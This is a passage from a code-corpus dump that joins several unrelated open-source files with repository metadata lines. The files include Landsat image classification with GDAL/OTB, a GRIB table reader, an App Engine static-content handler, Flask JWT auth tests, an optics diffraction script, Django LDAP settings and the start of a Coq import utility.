except ZeroDivisionError:
e = str('The provided ROI {} does not overlap with scene {}'.format(self.roi,scene))
raise Exception
#use gdalwarp to cut bands to roi
try:
#go through bands
for band in bands:
cmd = ['gdalwarp','-overwrite','-q','-cutline',self.roi,'-crop_to_cutline',self.ls_path+band,self.ls_path+band[:-4]+'_satexTMP_ROI'+pattern[1:]]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Cropped band {} to ROI'.format(band))
except:
e = str('Could not execute gdalwarp cmd: {}.\nError is:{}'.format(' '.join(cmd),error))
raise Exception
# Layerstack
try:
#respect order B1,B2,B3,B4,B5,B6,B7,B9,B10,B11
in_files = [str(self.ls_path+b[:-4]+'_satexTMP_ROI'+pattern[1:]) for b in bands]
in_files.sort()
if nr_bands==10:
# For Landsat 8 B10,B11 considered smaller --> resort
in_files = in_files[2:] + in_files[0:2]
out_file = str(os.path.dirname(self.out_fname)+'/'+scene+'_satex_mul'+pattern[1:])
#call otb wrapper
error = ut.otb_concatenate(in_files,out_file)
if error!='success': raise ZeroDivisionError
#append file to list
out_files.append(out_file)
#qgis.core.QgsMessageLog.logMessage(str('Concatenated bands for scene {}'.format(scene)))
print str('Concatenated bands for scene {}'.format(scene))
except ZeroDivisionError:
e = str('Could not execute OTB ConcatenateImages for scene: {}\nin_files: {}\nout_file: {}. \nError is: {}'.format(scene,in_files,out_file,error))
raise Exception
# after all scenes were processed combine them to a virtual raster tile
try:
cmd = ["gdalbuildvrt","-q","-srcnodata","0","-overwrite",self.out_fname]
for f in out_files:
cmd.append(f)
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Merged {} different scenes to {}'.format(len(out_files),self.out_fname))
except subprocess.CalledProcessError:
e = str('Could not execute gdalbuildvrt cmd: {}'.format(' '.join(cmd)))
raise Exception
##add to map canvas if checked
#if self.Pdlg.checkBox.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_vrt")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(str('Exception: {}'.format(e)))
print str('Exception: {}'.format(e))
#qgis.core.QgsMessageLog.logMessage(str('Exception occurred...deleting temporary files'))
print str('Exception occurred...deleting temporary files')
ut.delete_tmps(self.ls_path)
else:
#qgis.core.QgsMessageLog.logMessage(str('Processing sucessfully completed'))
#qgis.core.QgsMessageLog.logMessage(str('Deleting temporary files'))
print str('Processing sucessfully completed')
print str('Deleting temporary files')
#self.iface.messageBar().pushMessage('Processing successfully completed, see log for details',self.iface.messageBar().SUCCESS,duration=3)
print 'Processing successfully completed, see log for details'
ut.delete_tmps(self.ls_path)
def run_classification(self):
"""Run method that performs all the real work"""
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
#Get user edits
valid_input=self.updateCForm()
#TODO:fix
self.classification_type='libsvm'
self.svmModel = self.in_train[:-4]+'_svmModel.svm'
self.ConfMatrix = self.in_train[:-4]+'_CM.csv'
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
e = 'Unspecified error'
try:
#instantiate utilities functions
ut = utils.utils()
#FIX:overwrite utils function train
print "FIX:overwriting utils function otb_train_cls due to bug in otb"
#def new_train_classifier(raster, train, stats, classification_type, label, svmModel, ConfMatrix):
# cmd = "~/OTB-5.10.1-Linux64/bin/otbcli_TrainImagesClassifier -io.il {} -io.vd {} -io.imstat {} -sample.mv 100 -sample.vfn {} -classifier {} -classifier.libsvm.k linear -classifier.libsvm.c 1 -classifier.libsvm.opt false -io.out {} -io.confmatout {}".format(raster,train,stats,label,classification_type,svmModel,ConfMatrix)
# os.system(cmd)
# return "success"
#ut.otb_train_classifier=new_train_classifier
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
#check if training fields overlap with raster
if not self.external:
try:
error,overlap = ut.vector_raster_overlap(self.in_train,self.raster)
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function')
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('At least one feature in {} does not overlap with {}'.format(self.in_train,self.raster))
raise Exception
#generate image statistics
try:
self.stats = str(self.raster[:-4]+'_stats.xml')
error=ut.otb_image_statistics(str(self.raster),str(self.stats))
if error!='success':raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Calculated image statistics {} for {}'.format(self.stats,self.raster)))
print str('Calculated image statistics {} for {}'.format(self.stats,self.raster))
except ZeroDivisionError:
e = str('Could not execute OTB Image Statistics on: {}. \nError is:{}'.format(self.raster,error))
raise Exception
#differntiate two cases case 1) external SVM provided an case 2) on the fly SVM training
if self.external:
if self.in_train!='':
#use full training set for testing
self.test = self.in_train
#get SVM filename
self.svmModel = self.Cdlg.lineEdit_4.text()
else:
#split training dataset in 80% train 20% testing
[self.error,self.test,self.train] = ut.split_train(self.in_train,self.label,self.startupinfo)
if self.error != 'success':
e=self.error
raise Exception
else:
#qgis.core.QgsMessageLog.logMessage(str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test)))
print str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test))
#train classifier
#on the fly (wrong) confusion matrix gets overwritten later
try:
error=ut.otb_train_classifier(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix)
if error!='success': raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Trained image classifier using {} and {}'.format(self.raster,self.train)))
print str('Trained image classifier using {} and {}'.format(self.raster,self.train))
except ZeroDivisionError:
e = 'Could not execute OTB TrainClassifiers with {} {} {} {} {} {} {}. \nError is:{}'.format(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix,error)
raise Exception
#classify image
try:
error=ut.otb_classification(self.raster, self.stats, self.svmModel, self.out_fname)
if error!='success': raise ZeroDivisionError
print str('Image {} classified as {}'.format(self.raster,self.out_fname))
except ZeroDivisionError:
e = 'Could not execute OTB Classifier with {}, {}, {}, {}. \n Error is: {}'.format(self.raster, self.stats, self.svmModel, self.out_fname,error)
raise Exception
#confusion matrix
try:
#testing is optional in case of externally provided SVM
if self.in_train!='':
print self.out_fname,self.ConfMatrix,self.test,self.label
error=ut.otb_confusion_matrix(self.out_fname,self.ConfMatrix,self.test,self.label)
if error!='success':raise ZeroDivisionError
print str('Confusion matrix calculated on classified image {} with test set {} saved as {}'.format(self.out_fname,self.test,self.ConfMatrix))
except ZeroDivisionError:
e = 'Could not execute OTB Confusion Matrix with {}, {}, {}, {}. \nError is: {}'.format(self.out_fname, self.ConfMatrix, self.test, self.label)
raise Exception
#if sieving is asked perform sieving
#if self.Cdlg.checkBox_3.isChecked():
if (self.config['sieve']!=''):
try:
if os.name=='nt':
cmd = ['gdal_sieve.bat','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
else:
cmd = ['gdal_sieve.py','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
except subprocess.CalledProcessError:
e = 'Could not execute {}'.format(cmd)
raise Exception
#add to map canvas if checked
#if self.Cdlg.checkBox_2.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_classified_scene")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(e)
print e
else:
print str('Processing completed')
print 'Processing successfully completed, see log for details'
def main():
import ConfigParser
#read config
Config = ConfigParser.ConfigParser()
Config.read("config.ini")
#store as dictionary
config = {}
#preprocessing
parameters = ['ls_path','roi','out_fname']
for par in parameters:
try:
config[par] = Config.get("preprocessing",par)
except:
config[par] = ''
#save before overriden
config['out_fname1']= config['out_fname']
#classification
parameters = ['raster','in_train','out_fname','label','sieve','external']
for par in parameters:
try:
config[par] = Config.get("classification",par)
except:
config[par] = ''
#satex instance
satex = SatEx(config)
#workflow
if (config['ls_path']!=''):
satex.run_preprocessing()
else:
print 'No valid preprocessing configuration found. Skipping..'
if (config['raster']!=''):
satex.run_classification()
else:
print 'No valid classification configuration found. Skipping..'
if __name__ == "__main__":
main()
| bsd-3-clause | -9,089,529,124,461,430,000 | 41.912833 | 332 | 0.574903 | false |
ARPA-SIMC/arkimet | python/arkimet/formatter/eccodes.py | 1 | 3601 | import os
import re
def get_eccodes_def_dir() -> str:
"""
get the list of directories (separated by :) where grib_api/eccodes keep their definitions
"""
path = os.environ.get("ECCODES_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
path = os.environ.get("GRIBAPI_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
return ["/usr/share/eccodes/definitions/"]
class GribTable:
"""
Read a grib table.
edition is the GRIB edition: 1 or 2
table is the table name, for example "0.0"
Returns a table where the index maps to a couple { abbreviation, description },
or nil if the file had no such entry.
For convenience, the table has also two functions, 'abbr' and 'desc', that
return the abbreviation or the description, falling back on returning the table
index if they are not available.
For example:
origins = GribTable(1, "0")
print(origins.abbr(98)) -- Prints 'ecmf'
print(origins.desc(98)) -- Prints 'European Center for Medium-Range Weather Forecasts'
print(origins.abbr(999)) -- Prints '999'
print(origins.desc(999)) -- Prints '999'
"""
cache = {}
re_table_line = re.compile(r"^\s*(?P<idx>\d+)\s+(?P<abbr>\S+)\s+(?P<desc>.+)$")
def __init__(self, edition: int, table: str):
self.edition = edition
self.table = table
self._abbr = {}
self._desc = {}
for path in get_eccodes_def_dir():
# Build the file name
fname = os.path.join(path, "grib" + str(edition), str(table)) + ".table"
try:
with open(fname, "rt") as fd:
for line in fd:
mo = self.re_table_line.match(line)
if not mo:
continue
idx = int(mo.group("idx"))
self._abbr[idx] = mo.group("abbr")
self._desc[idx] = mo.group("desc").strip()
except FileNotFoundError:
pass
def set(self, code: int, abbr: str, desc: str):
"""
Add/replace a value in the table
"""
self._abbr[code] = abbr
self._desc[code] = desc
def has(self, val: int) -> bool:
return val in self._abbr
def abbr(self, val: int) -> str:
"""
Get an abbreviated description
"""
res = self._abbr.get(val)
if res is None:
return str(val)
else:
return res
def desc(self, val: int) -> str:
"""
Get a long description
"""
res = self._desc.get(val)
if res is None:
return str(val)
else:
return res
@classmethod
def load(cls, edition: int, table: str) -> "GribTable":
key = (edition, table)
res = cls.cache.get(key)
if res is None:
res = cls(edition, table)
cls.cache[key] = res
return res
@classmethod
def get_grib2_table_prefix(cls, centre, table_version, local_table_version):
default_table_version = 4
if table_version is None or table_version == 255:
table_version = default_table_version
if local_table_version is not None and local_table_version not in (0, 255):
centres = cls.load(1, "0")
if centres.has(centre):
return os.path.join('tables', 'local', centres.abbr(centre), str(local_table_version))
return os.path.join('tables', str(table_version))
| gpl-2.0 | -5,546,674,192,884,967,000 | 29.008333 | 102 | 0.546515 | false |
html5rocks/updates.html5rocks.com | static.py | 1 | 5965 | import datetime
import hashlib
from google.appengine.api import memcache
from google.appengine.api import taskqueue
from google.appengine.ext import db
from google.appengine.ext import deferred
from google.appengine.datastore import entity_pb
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
import fix_path
import aetycoon
import config
import utils
HTTP_DATE_FMT = "%a, %d %b %Y %H:%M:%S GMT"
if config.google_site_verification is not None:
ROOT_ONLY_FILES = ['/robots.txt','/' + config.google_site_verification]
else:
ROOT_ONLY_FILES = ['/robots.txt']
class StaticContent(db.Model):
"""Container for statically served content.
The serving path for content is provided in the key name.
"""
body = db.BlobProperty()
content_type = db.StringProperty()
status = db.IntegerProperty(required=True, default=200)
last_modified = db.DateTimeProperty(required=True)
etag = aetycoon.DerivedProperty(lambda x: hashlib.sha1(x.body).hexdigest())
indexed = db.BooleanProperty(required=True, default=True)
headers = db.StringListProperty()
def get(path):
"""Returns the StaticContent object for the provided path.
Args:
path: The path to retrieve StaticContent for.
Returns:
A StaticContent object, or None if no content exists for this path.
"""
entity = memcache.get(path)
if entity:
entity = db.model_from_protobuf(entity_pb.EntityProto(entity))
else:
entity = StaticContent.get_by_key_name(path)
if entity:
memcache.set(path, db.model_to_protobuf(entity).Encode())
return entity
def set(path, body, content_type, indexed=True, **kwargs):
"""Sets the StaticContent for the provided path.
Args:
path: The path to store the content against.
body: The data to serve for that path.
content_type: The MIME type to serve the content as.
indexed: Index this page in the sitemap?
**kwargs: Additional arguments to be passed to the StaticContent constructor
Returns:
A StaticContent object.
"""
now = datetime.datetime.now().replace(second=0, microsecond=0)
defaults = {
"last_modified": now,
}
defaults.update(kwargs)
content = StaticContent(
key_name=path,
body=body,
content_type=content_type,
indexed=indexed,
**defaults)
content.put()
memcache.replace(path, db.model_to_protobuf(content).Encode())
try:
eta = now.replace(second=0, microsecond=0) + datetime.timedelta(seconds=65)
if indexed:
deferred.defer(
utils._regenerate_sitemap,
_name='sitemap-%s' % (now.strftime('%Y%m%d%H%M'),),
_eta=eta)
except (taskqueue.taskqueue.TaskAlreadyExistsError, taskqueue.taskqueue.TombstonedTaskError), e:
pass
return content
def add(path, body, content_type, indexed=True, **kwargs):
"""Adds a new StaticContent and returns it.
Args:
As per set().
Returns:
A StaticContent object, or None if one already exists at the given path.
"""
def _tx():
if StaticContent.get_by_key_name(path):
return None
return set(path, body, content_type, indexed, **kwargs)
return db.run_in_transaction(_tx)
def remove(path):
"""Deletes a StaticContent.
Args:
path: Path of the static content to be removed.
"""
memcache.delete(path)
def _tx():
content = StaticContent.get_by_key_name(path)
if not content:
return
content.delete()
return db.run_in_transaction(_tx)
class StaticContentHandler(webapp.RequestHandler):
def output_content(self, content, serve=True):
if content.content_type:
self.response.headers['Content-Type'] = content.content_type
last_modified = content.last_modified.strftime(HTTP_DATE_FMT)
# Add CORS and Chrome Frame support to entire site.
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'
self.response.headers['Last-Modified'] = last_modified
self.response.headers['ETag'] = '"%s"' % (content.etag,)
for header in content.headers:
key, value = header.split(':', 1)
self.response.headers[key] = value.strip()
if serve:
self.response.set_status(content.status)
self.response.out.write(content.body)
else:
self.response.set_status(304)
def get(self, path):
if not path.startswith(config.url_prefix):
if path not in ROOT_ONLY_FILES:
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
else:
if config.url_prefix != '':
path = path[len(config.url_prefix):]# Strip off prefix
if path in ROOT_ONLY_FILES:# This lives at root
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
content = get(path)
if not content:
self.error(404)
self.response.out.write(utils.render_template('404.html'))
return
serve = True
if 'If-Modified-Since' in self.request.headers:
try:
last_seen = datetime.datetime.strptime(
self.request.headers['If-Modified-Since'].split(';')[0],# IE8 '; length=XXXX' as extra arg bug
HTTP_DATE_FMT)
if last_seen >= content.last_modified.replace(microsecond=0):
serve = False
except ValueError, e:
import logging
logging.error('StaticContentHandler in static.py, ValueError:' + self.request.headers['If-Modified-Since'])
if 'If-None-Match' in self.request.headers:
etags = [x.strip('" ')
for x in self.request.headers['If-None-Match'].split(',')]
if content.etag in etags:
serve = False
self.output_content(content, serve)
application = webapp.WSGIApplication([
('(/.*)', StaticContentHandler),
])
def main():
fix_path.fix_sys_path()
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 | 6,382,424,280,634,468,000 | 30.230366 | 115 | 0.674602 | false |
rboman/progs | apps/mails/mimetest.py | 1 | 1080 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import smtplib
from email.MIMEText import MIMEText
file = open("CYGWIN-diffs.html",'r')
text = file.read()
file.close()
toA = "[email protected]"
fromA = "[email protected]"
mail = MIMEText(text)
mail['From'] = fromA
mail['Subject'] = "Sujet du message"
mail['To'] = toA
mail['Content-Type'] = "text/html"
smtp = smtplib.SMTP("smtp.ulg.ac.be")
smtp.set_debuglevel(1)
smtp.sendmail(fromA, [toA], mail.as_string())
smtp.close()
| apache-2.0 | -2,451,455,311,142,843,400 | 28.216216 | 76 | 0.703704 | false |
atlassian/asap-authentication-python | atlassian_jwt_auth/frameworks/flask/tests/test_flask.py | 1 | 5032 | import unittest
from flask import Flask
from atlassian_jwt_auth.contrib.flask_app import requires_asap
from atlassian_jwt_auth.contrib.tests.utils import get_static_retriever_class
from atlassian_jwt_auth.frameworks.flask import with_asap
from atlassian_jwt_auth.tests import utils
from atlassian_jwt_auth.tests.utils import (
create_token,
)
def get_app():
app = Flask(__name__)
app.config.update({
'ASAP_VALID_AUDIENCE': 'server-app',
'ASAP_VALID_ISSUERS': ('client-app',),
'ASAP_PUBLICKEY_REPOSITORY': None
})
@app.route("/")
@requires_asap
def view():
return "OK"
@app.route("/restricted-to-another-client/")
@with_asap(issuers=['another-client'])
def view_for_another_client_app():
return "OK"
return app
class FlaskTests(utils.RS256KeyTestMixin, unittest.TestCase):
""" tests for the atlassian_jwt_auth.contrib.tests.flask """
def setUp(self):
self._private_key_pem = self.get_new_private_key_in_pem_format()
self._public_key_pem = utils.get_public_key_pem_for_private_key_pem(
self._private_key_pem
)
self.app = get_app()
self.client = self.app.test_client()
retriever = get_static_retriever_class({
'client-app/key01': self._public_key_pem
})
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = retriever
def send_request(self, token, url='/'):
""" returns the response of sending a request containing the given
token sent in the Authorization header.
"""
return self.client.get(url, headers={
'Authorization': b'Bearer ' + token
})
def test_request_with_valid_token_is_allowed(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_rejected_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = True
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 401)
def _assert_request_with_duplicate_jti_is_accepted(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_accepted(self):
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_duplicate_jti_is_accepted_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = False
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_invalid_audience_is_rejected(self):
token = create_token(
'client-app', 'invalid-audience',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_with_invalid_token_is_rejected(self):
response = self.send_request(b'notavalidtoken')
self.assertEqual(response.status_code, 401)
def test_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = (
get_static_retriever_class({
'another-client/key01': self._public_key_pem
})
)
token = create_token(
'another-client', 'server-app',
'another-client/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 403)
def test_decorated_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
url = '/restricted-to-another-client/'
self.assertEqual(self.send_request(token, url=url).status_code, 403)
def test_request_subject_and_issue_not_matching(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_subject_does_not_need_to_match_issuer_from_settings(self):
self.app.config['ASAP_SUBJECT_SHOULD_MATCH_ISSUER'] = False
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 200)
| mit | -3,690,334,047,130,404,000 | 35.201439 | 79 | 0.627385 | false |
haomiao/monster | setup.py | 1 | 2264 | '''
monster
-----
monster is a python general template framework for new project,
you can fastly build yourself projects.and before you know: It's MIT licensed!
some tips:
1. setup setuptools tool
2. run pip requirements.txt, setup the required modules
3. others
'''
import codecs
from setuptools import setup,find_packages
from setuptools.command.test import test as TestCommand
import os
import sys
import re
import ast
HERE = os.path.abspath(os.path.dirname(__file__))
_version_re = re.compile(r'__version__\s+=\s+(.*)')
class RunTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
def read(*parts):
return codecs.open(os.path.join(HERE, *parts), 'r').read()
monster_version = str(ast.literal_eval(_version_re.search(read("monster/__init__.py")).group(1)))
'''str(read('README.md'))'''
long_description = 'faf'
setup(
name='monster',
version=monster_version,
url='https://github.com/haomiao/monster',
author='colper',
author_email='[email protected]',
description='a python general template framework for new project',
long_description=long_description,
license='MIT',
packages=['monster'],
include_package_data=True,
#package_data={}
zip_safe=False,
platforms='any',
cmdclass={'test': RunTest},
tests_require=['pytest','nose'],
#install_requires=['pytest'],
#entry_points={}
extras_require={
'testing': ['pytest'],
},
classifiers = [
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Natural Language :: English',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| mit | 8,327,896,381,979,947,000 | 27.3 | 97 | 0.636484 | false |
srio/Diffraction | fresnel_kirchhoff_1D.py | 1 | 2886 | """
fresnel:
functions:
goFromTo: calculates the phase shift matrix
"""
__author__ = "Manuel Sanchez del Rio"
__contact__ = "[email protected]"
__copyright = "ESRF, 2012"
import numpy, math
def goFromTo(source,image,distance=1.0,lensF=None,wavelength=1e-10):
distance = numpy.array(distance)
x1 = numpy.outer(source,numpy.ones(image.size))
x2 = numpy.outer(numpy.ones(source.size),image)
r = numpy.sqrt( numpy.power(x1-x2,2) + numpy.power(distance,2) )
# add lens at the image plane
if lensF != None:
r = r - numpy.power(x1-x2,2)/lensF
wavenumber = numpy.pi*2/wavelength
return numpy.exp(1.j * wavenumber * r)
if __name__ == '__main__':
# wavelength = 1e-10
# aperture_diameter = 10e-6
# detector_size = 0.8e-3
# #wavelength = 500e-9
# #aperture_diameter = 1e-3
# #detector_size = 4e-3
#
# sourcepoints = 1000
# detpoints = 1000
# distance = 1.00
# lensF = None
# wavelength = 5000e-10
# sourcesize = 500e-6
# detector_size = 0.008
#wavelength = 500e-9
#aperture_diameter = 1e-3
#detector_size = 4e-3
wavelength = 1.24e-10 # 10keV
aperture_diameter = 40e-6 # 1e-3 # 1e-6
detector_size = 800e-6
distance = 3.6
sourcepoints = 1000
detpoints = 1000
lensF = None
sourcesize = aperture_diameter
position1x = numpy.linspace(-sourcesize/2,sourcesize/2,sourcepoints)
position2x = numpy.linspace(-detector_size/2,detector_size/2,detpoints)
fields12 = goFromTo(position1x,position2x,distance, \
lensF=lensF,wavelength=wavelength)
print ("Shape of fields12: ",fields12.shape)
#prepare results
fieldComplexAmplitude = numpy.dot(numpy.ones(sourcepoints),fields12)
print ("Shape of Complex U: ",fieldComplexAmplitude.shape)
print ("Shape of position1x: ",position1x.shape)
fieldIntensity = numpy.power(numpy.abs(fieldComplexAmplitude),2)
fieldPhase = numpy.arctan2(numpy.real(fieldComplexAmplitude), \
numpy.imag(fieldComplexAmplitude))
#
# write spec formatted file
#
out_file = "fresnel_kirchhoff_1D.spec"
f = open(out_file, 'w')
header="#F %s \n\n#S 1 fresnel-kirchhoff diffraction integral\n#N 3 \n#L X[m] intensity phase\n"%out_file
f.write(header)
for i in range(detpoints):
out = numpy.array((position2x[i], fieldIntensity[i], fieldPhase[i]))
f.write( ("%20.11e "*out.size+"\n") % tuple( out.tolist()) )
f.close()
print ("File written to disk: %s"%out_file)
#
#plots
#
from matplotlib import pylab as plt
plt.figure(1)
plt.plot(position2x*1e6,fieldIntensity)
plt.title("Fresnel-Kirchhoff Diffraction")
plt.xlabel("X [um]")
plt.ylabel("Intensity [a.u.]")
plt.show() | gpl-2.0 | -2,424,140,715,528,884,700 | 27.029126 | 112 | 0.618157 | false |
jlaine/django-ldapdb | examples/settings.py | 1 | 3440 | # -*- coding: utf-8 -*-
# This software is distributed under the two-clause BSD license.
# Copyright (c) The django-ldapdb project
from __future__ import unicode_literals
import ldap
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'ldapdb.db',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
},
'ldap': {
'ENGINE': 'ldapdb.backends.ldap',
'NAME': 'ldap://localhost',
'USER': 'cn=admin,dc=nodomain',
'PASSWORD': 'test',
# 'TLS': True,
'CONNECTION_OPTIONS': {
ldap.OPT_X_TLS_DEMAND: True,
}
}
}
DATABASE_ROUTERS = ['ldapdb.router.Router']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'some_random_secret_key'
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
]
ROOT_URLCONF = 'examples.urls'
STATIC_URL = '/static/'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'ldapdb',
'examples',
'django.contrib.admin',
)
| bsd-2-clause | 2,770,507,173,983,944,000 | 29.714286 | 79 | 0.654651 | false |
JasonGross/coq-tools | import_util.py | 1 | 28530 | from __future__ import with_statement, print_function
import os, subprocess, re, sys, glob, os.path, tempfile, time
from functools import cmp_to_key
from memoize import memoize
from coq_version import get_coqc_help, get_coq_accepts_o, group_coq_args_split_recognized, coq_makefile_supports_arg
from custom_arguments import DEFAULT_VERBOSITY, DEFAULT_LOG
from util import cmp_compat as cmp
import util
__all__ = ["filename_of_lib", "lib_of_filename", "get_file_as_bytes", "get_file", "make_globs", "get_imports", "norm_libname", "recursively_get_imports", "IMPORT_ABSOLUTIZE_TUPLE", "ALL_ABSOLUTIZE_TUPLE", "absolutize_has_all_constants", "run_recursively_get_imports", "clear_libimport_cache", "get_byte_references_for", "sort_files_by_dependency", "get_recursive_requires", "get_recursive_require_names"]
file_mtimes = {}
file_contents = {}
lib_imports_fast = {}
lib_imports_slow = {}
DEFAULT_LIBNAMES=(('.', 'Top'), )
IMPORT_ABSOLUTIZE_TUPLE = ('lib', )# 'mod')
ALL_ABSOLUTIZE_TUPLE = ('lib', 'proj', 'rec', 'ind', 'constr', 'def', 'syndef', 'class', 'thm', 'lem', 'prf', 'ax', 'inst', 'prfax', 'coind', 'scheme', 'vardef')# , 'mod', 'modtype')
IMPORT_REG = re.compile('^R([0-9]+):([0-9]+) ([^ ]+) <> <> lib$', re.MULTILINE)
IMPORT_LINE_REG = re.compile(r'^\s*(?:Require\s+Import|Require\s+Export|Require|Load\s+Verbose|Load)\s+(.*?)\.(?:\s|$)', re.MULTILINE | re.DOTALL)
def warning(*objs):
print("WARNING: ", *objs, file=sys.stderr)
def error(*objs):
print("ERROR: ", *objs, file=sys.stderr)
def fill_kwargs(kwargs):
rtn = {
'libnames' : DEFAULT_LIBNAMES,
'non_recursive_libnames': tuple(),
'ocaml_dirnames' : tuple(),
'verbose' : DEFAULT_VERBOSITY,
'log' : DEFAULT_LOG,
'coqc' : 'coqc',
'coq_makefile' : 'coq_makefile',
'walk_tree' : True,
'coqc_args' : tuple(),
'inline_coqlib' : None,
}
rtn.update(kwargs)
return rtn
def safe_kwargs(kwargs):
for k, v in list(kwargs.items()):
if isinstance(v, list):
kwargs[k] = tuple(v)
return dict((k, v) for k, v in kwargs.items() if not isinstance(v, dict))
def fix_path(filename):
return filename.replace('\\', '/')
def absolutize_has_all_constants(absolutize_tuple):
